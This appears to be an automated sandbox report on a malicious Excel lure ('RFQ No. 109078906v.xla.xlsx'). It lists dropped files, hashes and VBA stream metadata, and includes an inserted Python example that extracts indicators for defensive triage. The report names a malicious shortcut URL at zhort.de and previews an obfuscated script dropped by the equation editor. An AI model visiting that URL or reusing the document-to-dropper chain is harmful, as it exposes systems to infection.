                                                                      MD5:0ED70B648343E7CB1BC56F6BBED23E4F
                                                                      SHA1:769AB5A7D8C41F36B4B9E1EF8EDD7BB416043F60
                                                                      SHA-256:8BD23CFEB4C176ED0B49197500EAD3BAE6C130044CF33B778ADE36B3F7A2634A
                                                                      SHA-512:E97B0AF07DE2A3B25372584BA0DDD955EB64FF31BD39AD348D8DC62D9D9CD2EC628F96890E1AD055732272859CDDB423537F816ED19FEC86E9F7C1C394BA58E7
                                                                      Malicious:true
                                                                      Preview:[InternetShortcut]..URL=https://zhort.de/FoNVg0..
                                                                      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                      File Type:ASCII text, with CRLF line terminators
                                                                      Category:dropped
                                                                      Size (bytes):41
                                                                      Entropy (8bit):4.271470906740503
                                                                      Encrypted:false
                                                                      SSDEEP:3:bDJhCWpt2kZ1:b7CUxb
                                                                      MD5:2D4963B253DDF772BF52B60FC3B8842F
                                                                      SHA1:846A135842F0884160B0A8D049153D954A9A9264
                                                                      SHA-256:19F6856EB942E69A9D0CE3036A8340D2D2279F03F270B87C5D3FD5D5D5A3C46A
                                                                      SHA-512:8C0A1F42DE8CF52AFF157664DA1DFB43C8CD5AC38912CEE750E11BA751329A679695A49126A871DA9BC066A706547645EFFD4BD7ECECE4E3B8A52F49746D4DB2
                                                                      Malicious:false
                                                                      Preview:[folders]..FoNVg0.url=0..zhort.de.url=0..
                                                                      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                      File Type:MS Windows 95 Internet shortcut text (URL=<https://zhort.de/>), ASCII text, with CRLF line terminators
                                                                      Category:dropped
                                                                      Size (bytes):43
                                                                      Entropy (8bit):4.340891860212397
                                                                      Encrypted:false
                                                                      SSDEEP:3:HRAbABGQYm2fzD:HRYFVm4H
                                                                      MD5:7B430E77026D35F4B4E760DB85B70575
                                                                      SHA1:13125F9685E08DC3EB0D20E9EEA8092E8BC052ED
                                                                      SHA-256:8BEF7BE05D45AE0CCA841BBF85E3FF266942452379B166A211213680FBDDD012
                                                                      SHA-512:C733F156EECC928A2557044D5D5490DE9653B0EFD8C68F96AA81B4BB6E333C81BBAAA573C09B47C5B0AEBDDEF122D6A1EB4BE3E0F6E7C92FE95D1309F3AAC418
                                                                      Malicious:true
                                                                      Preview:[InternetShortcut]..URL=https://zhort.de/..
                                                                      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                      File Type:data
                                                                      Category:dropped
                                                                      Size (bytes):162
                                                                      Entropy (8bit):2.503835550707525
                                                                      Encrypted:false
                                                                      SSDEEP:3:vrJlaCkWtVypil69oycWjUbtFJlln:vdsCkWtTl69oyjUvl
                                                                      MD5:CB3D0F9D3F7204AF5670A294AB575B37
                                                                      SHA1:5E792DFBAD5EDA9305FCF8F671F385130BB967D8
                                                                      SHA-256:45968B9F50A9B4183FBF4987A106AB52EB3EF3279B2118F9AB01BA837DC3968A
                                                                      SHA-512:BD116CAF3ACA40A5B90168A022C84923DB51630FA0E62E46020B71B8EB9613EAE776D476B0C6DE0D5F15642A74ED857765150F406937FBA5CB995E9FCDAC81AE
                                                                      Malicious:false
                                                                      Preview:.user..................................................A.l.b.u.s.............p........1...............2..............@3...............3......z.......p4......x...
                                                                      Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                      File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                      Category:dropped
                                                                      Size (bytes):183474
                                                                      Entropy (8bit):3.8646231642419524
                                                                      Encrypted:false
                                                                      SSDEEP:1536:WJNuBK2J+KxCPpyHa6XgeeLgt5pzeyGw9HkJm4Ortmf3J2GtLRENhc8kVNYYN3I2:oEK2VsAggt5phGw9SCLEVwixi79UeUf
                                                                      MD5:A285D18480C6F6CC2D261CDE7354D19D
                                                                      SHA1:D44C64C965E46B6AB12BD418F07E671A50E74CA2
                                                                      SHA-256:6FE6D465B7B4E666A8B8AF9B0CE9BB28B731E097384F26C2E2C1376FB21F904A
                                                                      SHA-512:42BCDDFF6189953F0412D967E22DC8ACADAF1C64FB9D9FC868BCB21F097AC13ADB0C6FC6100375B6C94FD8F0022B63300F9A3BD029602D29E493DFD13C23F1C6
                                                                      Malicious:true
                                                                      Preview:......d.L.I.c.i.c.J.f.h.G. .=. .".q.z.L.W.G.G.W.S.L.L.".....c.m.p.L.L.A.f.P.G.s. .=. .".p.C.e.L.T.J.G.R.n.B.".....n.l.f.K.h.k.T.W.K.T. .=. .".z.C.L.m.P.J.A.o.m.x.".....A.N.C.j.G.q.j.i.W.W. .=. .".h.x.W.c.W.m.K.k.m.z.".....L.W.U.L.W.N.i.a.A.l. .=. .".K.z.i.U.L.i.g.r.k.z.".....k.A.e.k.G.m.b.k.B.f. .=. .".A.L.Z.z.n.A.W.O.B.d.".....b.h.d.f.A.H.m.g.p.L. .=. .".U.u.u.K.W.z.i.i.o.C.".........B.C.H.L.N.P.t.z.Z.L. .=. .".e.d.K.N.A.z.i.K.A.C.".....U.z.Z.G.L.G.p.o.U.f. .=. .".l.q.b.m.e.l.s.q.a.G.".....A.c.N.f.q.o.k.j.b.d. .=. .".W.o.U.U.W.K.I.W.K.K.".....k.z.L.v.i.k.u.W.G.j. .=. .".i.L.i.c.C.u.K.Z.T.Q.".....G.m.J.e.N.W.q.A.a.U. .=. .".C.z.G.L.f.o.c.G.W.L.".....K.m.L.e.s.N.o.z.U.v. .=. .".W.h.e.N.s.q.U.Z.i.c.".....S.m.N.z.k.q.L.v.H.G. .=. .".T.p.m.j.k.A.g.W.U.L.".....N.m.m.z.A.R.l.K.i.a. .=. .".N.Z.P.e.R.H.c.d.l.c.".....g.L.m.n.K.G.K.s.N.K. .=. .".a.h.q.O.n.A.n.a.u.q.".....i.r.O.l.L.N.z.W.e.P. .=. .".s.G.b.i.o.L.L.t.W.z.".........L.U.Q.K.k.T.K.U.L.o. .=. .".o.Z.L.n.i.U.Q.L.O.H.".....B.c.c.W.d.n.e.
                                                                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                      File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Wed Aug 28 05:54:25 2024, Security: 1
                                                                      Category:dropped
                                                                      Size (bytes):575488
                                                                      Entropy (8bit):7.9821275937940515
                                                                      Encrypted:false
                                                                      SSDEEP:12288:P+/zTAzN8oILs6XyBASpUoVs/w5lx04xY5xDGz1Rx3/RZkDEgjO7:PuzTwNTILRX8OoVsI/xyDGz1R5RJW
                                                                      MD5:592FEB49BA2875E91F13670B964AD15B
                                                                      SHA1:C842C3530E8F40AA6B56D8D2DB8DAF6489720288
                                                                      SHA-256:C830403D175EAE51D045B0A4C6F04FB88D44AABE4AE904B4CE95F5F94E7DB151
                                                                      SHA-512:82CEB491AC902F248002BEB3EE8769AF60F2C45AACE45DC08AFFEF0FAA21B1EBB885C7B88BA8A5580532884991D2F02458EC7C20A63D241F1707282A62888CC1
                                                                      Malicious:false
                                                                      Preview:......................>...................................)...................k.......m.......o.......q...............................................................................................................................................................................................................................................................................................................................................................................................................................b................................................................................................................... ...!..."...#...$...%...&...'...(...........a...,...-......./...0...1...2...3...4...5...6...7...8...9...:...;...<...=...>...?...@...A...B...C...D...E...F...G...H...I...J...K...L...M...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...d...e...f...g...h...i...j...l.......m...n...o...p...q...r...s...t...u...v...w...x...y...z...
                                                                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                      File Type:ASCII text, with CRLF line terminators
                                                                      Category:dropped
                                                                      Size (bytes):26
                                                                      Entropy (8bit):3.95006375643621
                                                                      Encrypted:false
                                                                      SSDEEP:3:ggPYV:rPYV
                                                                      MD5:187F488E27DB4AF347237FE461A079AD
                                                                      SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                      SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                      SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                      Malicious:false
                                                                      Preview:[ZoneTransfer]....ZoneId=0
                                                                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                      File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Wed Aug 28 05:54:25 2024, Security: 1
                                                                      Category:dropped
                                                                      Size (bytes):575488
                                                                      Entropy (8bit):7.9821275937940515
                                                                      Encrypted:false
                                                                      SSDEEP:12288:P+/zTAzN8oILs6XyBASpUoVs/w5lx04xY5xDGz1Rx3/RZkDEgjO7:PuzTwNTILRX8OoVsI/xyDGz1R5RJW
                                                                      MD5:592FEB49BA2875E91F13670B964AD15B
                                                                      SHA1:C842C3530E8F40AA6B56D8D2DB8DAF6489720288
                                                                      SHA-256:C830403D175EAE51D045B0A4C6F04FB88D44AABE4AE904B4CE95F5F94E7DB151
                                                                      SHA-512:82CEB491AC902F248002BEB3EE8769AF60F2C45AACE45DC08AFFEF0FAA21B1EBB885C7B88BA8A5580532884991D2F02458EC7C20A63D241F1707282A62888CC1
                                                                      Malicious:false
                                                                      Preview:......................>...................................)...................k.......m.......o.......q...............................................................................................................................................................................................................................................................................................................................................................................................................................b................................................................................................................... ...!..."...#...$...%...&...'...(...........a...,...-......./...0...1...2...3...4...5...6...7...8...9...:...;...<...=...>...?...@...A...B...C...D...E...F...G...H...I...J...K...L...M...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...d...e...f...g...h...i...j...l.......m...n...o...p...q...r...s...t...u...v...w...x...y...z...
                                                                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                      File Type:data
                                                                      Category:modified
                                                                      Size (bytes):165
                                                                      Entropy (8bit):1.4377382811115937
                                                                      Encrypted:false
                                                                      SSDEEP:3:vZ/FFDJw2fV:vBFFGS
                                                                      MD5:797869BB881CFBCDAC2064F92B26E46F
                                                                      SHA1:61C1B8FBF505956A77E9A79CE74EF5E281B01F4B
                                                                      SHA-256:D4E4008DD7DFB936F22D9EF3CC569C6F88804715EAB8101045BA1CD0B081F185
                                                                      SHA-512:1B8350E1500F969107754045EB84EA9F72B53498B1DC05911D6C7E771316C632EA750FBCE8AD3A82D664E3C65CC5251D0E4A21F750911AE5DC2FC3653E49F58D
                                                                      Malicious:true
                                                                      Preview:.user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
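The dropped-file records above are the sandbox's own listing. As an added example (not part of the Joe Sandbox report and not the sample's code), the Python below parses records in this key:value layout and extracts what a responder would pull from them: the URL carried by the WINWORD-dropped .url file, the SHA-256 of every entry the sandbox flagged Malicious:true, the Zone.Identifier value EXCEL.EXE wrote, and the set of processes that dropped files. The embedded sample is copied from three records in this section (hash fields other than SHA-256 omitted); the zone-to-Protected-View mapping is documented Windows/Office behaviour (ZoneId 3 and 4 trigger Protected View); all function and field names are the example's own.

```python
"""Turn Joe Sandbox 'Dropped Files' records into an IoC summary (added example)."""
import re
from dataclasses import dataclass
from typing import Optional

# Copied from three records in this report; fields other than SHA-256 trimmed.
SAMPLE = r"""
Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:MS Windows 95 Internet shortcut text (URL=<https://zhort.de/FoNVg0>), ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):49
SHA-256:8BD23CFEB4C176ED0B49197500EAD3BAE6C130044CF33B778ADE36B3F7A2634A
Malicious:true
Preview:[InternetShortcut]..URL=https://zhort.de/FoNVg0..
Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):26
SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
Malicious:false
Preview:[ZoneTransfer]....ZoneId=0
Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:very short file (no magic)
Category:dropped
Size (bytes):1
SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
Malicious:false
Preview:1
"""

# URL security zones as written into a Zone.Identifier alternate data stream.
# Office opens documents from zones 3 and 4 in Protected View; 0-2 are not gated.
ZONE_NAMES = {0: "LocalMachine", 1: "Intranet", 2: "Trusted", 3: "Internet", 4: "Restricted"}
URL_IN_TYPE = re.compile(r"URL=<([^>]+)>")
ZONE_ID = re.compile(r"ZoneId=(\d)")


@dataclass
class Dropped:
    process: str
    file_type: str
    size: int
    sha256: str
    malicious: bool
    preview: str

    @property
    def process_name(self) -> str:
        return self.process.rsplit("\\", 1)[-1]


def parse_records(text: str) -> list:
    """Split key:value lines into records; each 'Process:' line opens a new one."""
    raw, cur = [], None
    for line in text.splitlines():
        line = line.strip()
        if ":" not in line:
            continue
        key, _, value = line.partition(":")  # only the first ':' separates key from value
        if key == "Process":
            cur = {}
            raw.append(cur)
        if cur is not None:
            cur[key] = value
    return [
        Dropped(
            process=r["Process"],
            file_type=r.get("File Type", ""),
            size=int(r.get("Size (bytes)", "0")),
            sha256=r.get("SHA-256", ""),
            malicious=r.get("Malicious", "false").lower() == "true",
            preview=r.get("Preview", ""),
        )
        for r in raw
    ]


def shortcut_url(rec: Dropped) -> Optional[str]:
    """URL of a .url drop, read from the File Type field.

    The Preview field renders non-printable bytes (here CRLF) as dots, so the URL
    cannot be split from its terminator reliably there; the file-type string
    carries it verbatim between angle brackets.
    """
    m = URL_IN_TYPE.search(rec.file_type)
    return m.group(1) if m else None


def motw_zone(rec: Dropped) -> Optional[dict]:
    """Decode a Zone.Identifier drop: which zone, and whether Protected View applies."""
    if not rec.preview.startswith("[ZoneTransfer]"):
        return None
    m = ZONE_ID.search(rec.preview)
    if not m:
        return None
    zone = int(m.group(1))
    return {"zone": zone, "name": ZONE_NAMES.get(zone, "unknown"), "protected_view": zone in (3, 4)}


def extract_iocs(text: str) -> dict:
    """Collect URLs, malicious hashes, MotW findings and dropping processes."""
    iocs = {"urls": [], "malicious_sha256": [], "motw": [], "dropping_processes": set()}
    for r in parse_records(text):
        iocs["dropping_processes"].add(r.process_name)
        url = shortcut_url(r)
        if url:
            iocs["urls"].append(url)
        if r.malicious:
            iocs["malicious_sha256"].append(r.sha256)
        zone = motw_zone(r)
        if zone:
            iocs["motw"].append({"process": r.process_name, **zone})
    return iocs


if __name__ == "__main__":
    for key, val in extract_iocs(SAMPLE).items():
        print(f"{key}: {val}")
```

Run against the three sample records it reports one URL (https://zhort.de/FoNVg0), one malicious hash (the .url file's), and a Zone.Identifier with ZoneId=0 (LocalMachine), for which Protected View would not apply: the file Excel wrote carries no Internet-zone Mark of the Web. The process set (WINWORD.EXE, EXCEL.EXE, powershell.exe) is itself a triage signal for an .xlsx sample, since Word and PowerShell have no business writing files during a spreadsheet open.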
                                                                      File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Tue Aug 27 15:53:22 2024, Security: 1
                                                                      Entropy (8bit):7.961080273486884
                                                                      TrID:
                                                                      • Microsoft Excel sheet (30009/1) 47.99%
                                                                      • Microsoft Excel sheet (alternate) (24509/1) 39.20%
                                                                      • Generic OLE2 / Multistream Compound File (8008/1) 12.81%
                                                                      File name:RFQ No. 109078906v.xla.xlsx
                                                                      File size:568'832 bytes
                                                                      MD5:7d6c11d30d7322951af23907572b81ea
                                                                      SHA1:e48456f2059d8eeaf2b9a2788cbe53b160dbfc3c
                                                                      SHA256:7d919f1cc55ce5ee6cdd40968757296e07038d7cb676205d77bacff65baa672a
                                                                      SHA512:62b21f1d2f8f76484f71a54f63ca196a938387c4d9326c2d56f36b4a12a768228ea4e66d798700a64b125f9af4d8c3feeb4fed9b754c61199fd2003852e91e6f
                                                                      SSDEEP:12288:X+a2GbfPRQaJGEcTP7A9DHHCWoJX5WOJ//Cz6BAiZ3IHV:XlddJDcTPk9jCWw5Bb4HV
                                                                      TLSH:94C4232C32CAEF0BD68B08394DDC695B1FD5AD995F61C85332A637AF2C306E24291C57
                                                                      File Content Preview:........................>...................................)...................k.......m.......o.......q......................................................................................................................................................
                                                                      Icon Hash:2562ab89a7b7bfbf
                                                                      Document Type:OLE
                                                                      Number of OLE Files:1
                                                                      Has Summary Info:
                                                                      Application Name:Microsoft Excel
                                                                      Encrypted Document:True
                                                                      Contains Word Document Stream:False
                                                                      Contains Workbook/Book Stream:True
                                                                      Contains PowerPoint Document Stream:False
                                                                      Contains Visio Document Stream:False
                                                                      Contains ObjectPool Stream:False
                                                                      Flash Objects Count:0
                                                                      Contains VBA Macros:True
                                                                      Code Page:1252
                                                                      Author:
                                                                      Last Saved By:
                                                                      Create Time:2006-09-16 00:00:00
                                                                      Last Saved Time:2024-08-27 14:53:22
                                                                      Creating Application:Microsoft Excel
                                                                      Security:1
                                                                      Document Code Page:1252
                                                                      Thumbnail Scaling Desired:False
                                                                      Contains Dirty Links:False
                                                                      Shared Document:False
                                                                      Changed Hyperlinks:False
                                                                      Application Version:786432
                                                                      General
                                                                      Stream Path:_VBA_PROJECT_CUR/VBA/Sheet1
                                                                      VBA File Name:Sheet1.cls
                                                                      Stream Size:977
                                                                      Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . B . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 2 . 0 . -
                                                                      Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 0d 11 42 8b 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                      Attribute VB_Name = "Sheet1"
                                                                      Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
                                                                      Attribute VB_GlobalNameSpace = False
                                                                      Attribute VB_Creatable = False
                                                                      Attribute VB_PredeclaredId = True
                                                                      Attribute VB_Exposed = True
                                                                      Attribute VB_TemplateDerived = False
                                                                      Attribute VB_Customizable = True
                                                                      

                                                                      General
                                                                      Stream Path:_VBA_PROJECT_CUR/VBA/Sheet2
                                                                      VBA File Name:Sheet2.cls
                                                                      Stream Size:977
                                                                      Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . J . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 2 . 0 .
                                                                      Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 0d 11 1a 4a 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                      Attribute VB_Name = "Sheet2"
                                                                      Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
                                                                      Attribute VB_GlobalNameSpace = False
                                                                      Attribute VB_Creatable = False
                                                                      Attribute VB_PredeclaredId = True
                                                                      Attribute VB_Exposed = True
                                                                      Attribute VB_TemplateDerived = False
                                                                      Attribute VB_Customizable = True
                                                                      

                                                                      General
                                                                      Stream Path:_VBA_PROJECT_CUR/VBA/Sheet3
                                                                      VBA File Name:Sheet3.cls
                                                                      Stream Size:977
                                                                      Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 2 . 0 . -
                                                                      Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 0d 11 d0 1d 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                      Attribute VB_Name = "Sheet3"
                                                                      Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
                                                                      Attribute VB_GlobalNameSpace = False
                                                                      Attribute VB_Creatable = False
                                                                      Attribute VB_PredeclaredId = True
                                                                      Attribute VB_Exposed = True
                                                                      Attribute VB_TemplateDerived = False
                                                                      Attribute VB_Customizable = True
                                                                      

                                                                      General
                                                                      Stream Path:_VBA_PROJECT_CUR/VBA/ThisWorkbook
                                                                      VBA File Name:ThisWorkbook.cls
                                                                      Stream Size:985
                                                                      Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 2 . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 1 . 9 . -
                                                                      Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 0d 11 c3 32 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                      Attribute VB_Name = "ThisWorkbook"
                                                                      Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
                                                                      Attribute VB_GlobalNameSpace = False
                                                                      Attribute VB_Creatable = False
                                                                      Attribute VB_PredeclaredId = True
                                                                      Attribute VB_Exposed = True
                                                                      Attribute VB_TemplateDerived = False
                                                                      Attribute VB_Customizable = True
                                                                      

                                                                      General
                                                                      Stream Path:\x1CompObj
                                                                      CLSID:
                                                                      File Type:data
                                                                      Stream Size:114
                                                                      Entropy:4.25248375192737
                                                                      Base64 Encoded:True
                                                                      Data ASCII:. . . . . . . . . . . . . . . . . . . F & . . . M i c r o s o f t O f f i c e E x c e l 2 0 0 3 W o r k s h e e t . . . . . B i f f 8 . . . . . E x c e l . S h e e t . 8 . 9 q . . . . . . . . . . . .
                                                                      Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 20 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 26 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 32 30 30 33 20 57 6f 72 6b 73 68 65 65 74 00 06 00 00 00 42 69 66 66 38 00 0e 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                                                                      General
                                                                      Stream Path:\x5DocumentSummaryInformation
                                                                      CLSID:
                                                                      File Type:data
                                                                      Stream Size:244
                                                                      Entropy:2.889430592781307
                                                                      Base64 Encoded:False
                                                                      Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , 0 . . . . . . . . . . . . . . H . . . . . . . P . . . . . . . X . . . . . . . ` . . . . . . . h . . . . . . . p . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . S h e e t 1 . . . . . S h e e t 2 . . . . . S h e e t 3 . . . . . . . . . . . . . . . . . W o r k s h e e t s . . . . . . . . .
                                                                      Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 c4 00 00 00 08 00 00 00 01 00 00 00 48 00 00 00 17 00 00 00 50 00 00 00 0b 00 00 00 58 00 00 00 10 00 00 00 60 00 00 00 13 00 00 00 68 00 00 00 16 00 00 00 70 00 00 00 0d 00 00 00 78 00 00 00 0c 00 00 00 a1 00 00 00 02 00 00 00 e4 04 00 00
                                                                      General
                                                                      Stream Path:\x5SummaryInformation
                                                                      CLSID:
                                                                      File Type:data
                                                                      Stream Size:200
                                                                      Entropy:3.2503503175049815
                                                                      Base64 Encoded:False
                                                                      Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . + ' 0 . . . . . . . . . . . . . . @ . . . . . . . H . . . . . . . T . . . . . . . ` . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . | . # . @ . . . . . . . . . . . . . . .
                                                                      Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 98 00 00 00 07 00 00 00 01 00 00 00 40 00 00 00 04 00 00 00 48 00 00 00 08 00 00 00 54 00 00 00 12 00 00 00 60 00 00 00 0c 00 00 00 78 00 00 00 0d 00 00 00 84 00 00 00 13 00 00 00 90 00 00 00 02 00 00 00 e4 04 00 00 1e 00 00 00 04 00 00 00
                                                                      General
                                                                      Stream Path:MBD000E9660/\x1CompObj
                                                                      CLSID:
                                                                      File Type:data
                                                                      Stream Size:99
                                                                      Entropy:3.631242196770981
                                                                      Base64 Encoded:False
                                                                      Data ASCII:. . . . . . . . . . . . . . . . . . . . . . ! . . . M i c r o s o f t O f f i c e E x c e l W o r k s h e e t . . . . . E x c e l M L 1 2 . . . . . 9 q . . . . . . . . . . . .
                                                                      Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 21 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 57 6f 72 6b 73 68 65 65 74 00 0a 00 00 00 45 78 63 65 6c 4d 4c 31 32 00 00 00 00 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                                                                      General
                                                                      Stream Path:MBD000E9660/Package
                                                                      CLSID:
                                                                      File Type:Microsoft Excel 2007+
                                                                      Stream Size:19363
                                                                      Entropy:7.65458028132816
                                                                      Base64 Encoded:True
                                                                      Data ASCII:P K . . . . . . . . . . ! . D . 2 . . . . . . . . . . [ C o n t e n t _ T y p e s ] . x m l . . ( . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                      Data Raw:50 4b 03 04 14 00 06 00 08 00 00 00 21 00 44 19 a7 ee 32 01 00 00 c9 02 00 00 13 00 08 02 5b 43 6f 6e 74 65 6e 74 5f 54 79 70 65 73 5d 2e 78 6d 6c 20 a2 04 02 28 a0 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                      General
